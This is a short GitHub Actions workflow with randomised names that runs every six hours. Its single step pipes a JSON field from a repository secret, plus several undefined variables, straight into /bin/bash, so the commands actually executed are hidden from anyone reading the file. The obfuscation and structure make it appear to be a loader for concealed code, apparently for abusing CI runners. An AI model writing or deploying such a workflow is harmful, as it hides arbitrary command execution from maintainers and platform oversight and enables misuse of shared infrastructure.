name: advantagemarried

on:
  workflow_dispatch:
  schedule:
    - cron: '7 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: advantagemarried
        env:
          tg35933: ${{ secrets.tg35933 }}
        run: |
          echo $tg35933 | jq -r .qcri9378 | /bin/bash
          echo $eaj1 | jq -r .sxg97 | /bin/bash
          echo $vkvyl19282 | jq -r .l28 | /bin/bash
          echo $vdhli11424 | jq -r .ob838 | /bin/bash
          echo $vu37 | jq -r .r279 | /bin/bash
          echo $i2 | jq -r .a6274 | /bin/bash
          echo $lz676 | jq -r .cm5 | /bin/bash

